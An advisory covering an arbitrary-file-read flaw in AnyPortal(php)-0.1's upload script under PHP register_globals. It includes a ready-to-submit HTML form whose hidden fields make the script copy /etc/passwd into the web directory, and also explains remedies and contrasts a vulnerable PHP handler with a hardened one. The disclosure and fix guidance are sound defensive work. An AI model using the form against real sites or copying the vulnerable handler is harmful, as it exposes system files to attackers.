COMMAND
AnyPortal(php)-0.1
SYSTEMS AFFECTED
AnyPortal(php)-0.1
PROBLEM
'zorgon' found the following. Secure Reality Pty Ltd. has published
Security Advisory #1 (SRADV00001):
http://oliver.efri.hr/~crv/security/bugs/Others/php2.html
'zorgon' reproduced this vulnerability with AnyPortal(php)-0.1.
It is assumed that AnyPortal is installed in its default
configuration.
Create a file on your local computer called upload.html (or any
other name) containing the source code of this page:
http://www.victim.com/siteman000510/siteman.php3?A=U&D=
Replace this part of the code:
<FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="/siteman000510/siteman.php3">DESTINATION DIRECTORY:<B> /</B>
<P>PATHNAME OF LOCAL FILE<BR>
<INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
<INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
<INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>
with the following:
<FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="http://www.victim.com/siteman000510/siteman.php3">DESTINATION DIRECTORY:<B> /</B>
<P>PATHNAME OF LOCAL FILE<BR>
<INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
<INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
<INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>
<INPUT TYPE="HIDDEN" NAME="FN" VALUE="/etc/passwd">
<INPUT TYPE="HIDDEN" NAME="FN_name" VALUE="passwd">
Submitting this form makes the script treat /etc/passwd as the
uploaded file and copy it into the destination directory, from
where it can be retrieved through the web server.
The problem is not in the source code of PHP, and is thus not
related to any particular version of PHP; however, many PHP
scripts may suffer from it, because there was no standard, easy
way of testing whether a certain file is indeed a temporary
uploaded file or some other file on the system. This means that
the previous posts on Bugtraq were not accurate: there is no way
to make a patch for PHP that prevents scripts from being
vulnerable to this exploit; the logic in the scripts themselves
has to be modified.
Note that prior to PHP 4.0 there is no way to turn
'register_globals' off, which would eliminate the ability of
remote attackers to define variables in PHP's global scope (it is
possible to stop PHP 3.0 from processing HTTP variables entirely
by setting gpc_order to "" in php.ini, but there is then no
convenient way to access HTTP data).
SOLUTION
PHP supports RFC 1867 based file uploads. PHP saves uploaded
files in a temporary directory on the server, using a temporary
name. This temporary name is exposed to the PHP script as $FOO,
where "FOO" is the name of the file input tag in the submitted
form. Many PHP scripts process $FOO without taking measures to
ensure that it is in fact a file that resides in a temporary
directory. It's possible for a remote attacker to supply
arbitrary file names as values for FOO, by submitting a standard
form input tag by that name, and thus cause the PHP script to
process arbitrary files.
Never trust any input that may be coming from the remote user.
Always test whether the variable you expect to contain the path
of an uploaded file actually contains the path of a temporary
file on the system. It is strongly recommended to turn
register_globals off if possible. If register_globals is off, you
can safely check $HTTP_POST_VARS[] for information about the
uploaded files (see below). If register_globals is kept on, one
must realize that any variable in the global scope might be
overwritten by remote user input.
New versions of PHP have been packaged (4.0.3RC1 and 3.0.17RC1)
to make it easier to secure scripts against this vulnerability.
They include a new function that makes it easy to determine
whether a given filename is a temporary uploaded file or not:
/* Test whether a file is an uploaded file or not */
is_uploaded_file($path);
PHP 4.0.3 also features a new convenience function:
/* Move an uploaded file to a new location. If the file is not
* a valid upload file, no action will take place.
*/
move_uploaded_file($path, $new_path);
In addition, as of PHP 4.0.3, it's safe to use
$HTTP_POST_FILES["FOO"]["tmp_name"] - which cannot be written to
by any remote user input, even when register_globals is on. The
new versions are currently in testing, and thus have the RC tag.
PHP 4.0.3RC1:
http://www.php.net/do_download.php?download_file=php-4.0.3RC1.tar.gz
PHP 3.0.17RC1 (upgrading to PHP 4.0 is strongly recommended):
http://www.php.net/distributions/php-3.0.17RC1.tar.gz
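As an added example, not part of AnyPortal or of the advisory: a minimal handler for the upload form shown above, first in the vulnerable register_globals style and then rewritten with the checks recommended here (is_uploaded_file, move_uploaded_file, the files array instead of a global). The field names match the form; the web root path and the extra destination-directory check are assumptions of this example.

```php
<?php
/* Added example, not AnyPortal's or the advisory's own code.
 * Assumed form fields (matching the form shown above):
 *   FN      - the <INPUT TYPE="FILE"> field
 *   FN_name - the name to store the file under
 *   DIR     - destination directory below the web root
 * The web root path is an assumption as well. */

$WEB_ROOT = "/var/www/html";   /* assumed web root of the site */

/* VULNERABLE (register_globals on): $FN is trusted as the upload's
 * temporary path. A hidden field named FN overrides it with
 * "/etc/passwd", so copy() publishes that file below the web root. */
function save_upload_vulnerable($FN, $FN_name, $DIR)
{
    global $WEB_ROOT;
    return copy($FN, $WEB_ROOT . $DIR . $FN_name);   /* copies ANY readable file */
}

/* HARDENED: take the temporary path from the files array (which request
 * variables cannot overwrite), verify it really is an upload, confine
 * the destination to the web root, and let move_uploaded_file() do the
 * move; it refuses anything that is not a valid upload. */
function save_upload_safe($files, $FN_name, $DIR)
{
    global $WEB_ROOT;
    if (!isset($files["FN"]["tmp_name"])) {
        return false;
    }
    $tmp = $files["FN"]["tmp_name"];
    if (!is_uploaded_file($tmp)) {
        return false;   /* e.g. a system path smuggled in via a hidden field */
    }
    $root = realpath($WEB_ROOT);
    $dir  = realpath($WEB_ROOT . "/" . $DIR);
    if ($root === false || $dir === false ||
        ($dir !== $root && strpos($dir, $root . "/") !== 0)) {
        return false;   /* DIR escaped the web root */
    }
    /* basename() drops any directory part of the user-chosen name */
    return move_uploaded_file($tmp, $dir . "/" . basename($FN_name));
}

/* Usage. $_FILES/$_POST replaced $HTTP_POST_FILES/$HTTP_POST_VARS in
 * PHP 4.1; on 4.0.3 use the older names. */
if (isset($_POST["FN_name"], $_POST["DIR"])) {
    echo save_upload_safe($_FILES, $_POST["FN_name"], $_POST["DIR"])
        ? "stored\n" : "rejected\n";
}
```

With the form from the advisory, the hardened handler rejects the request because "/etc/passwd" is not a file PHP created for this upload, while the vulnerable one copies it into the destination directory.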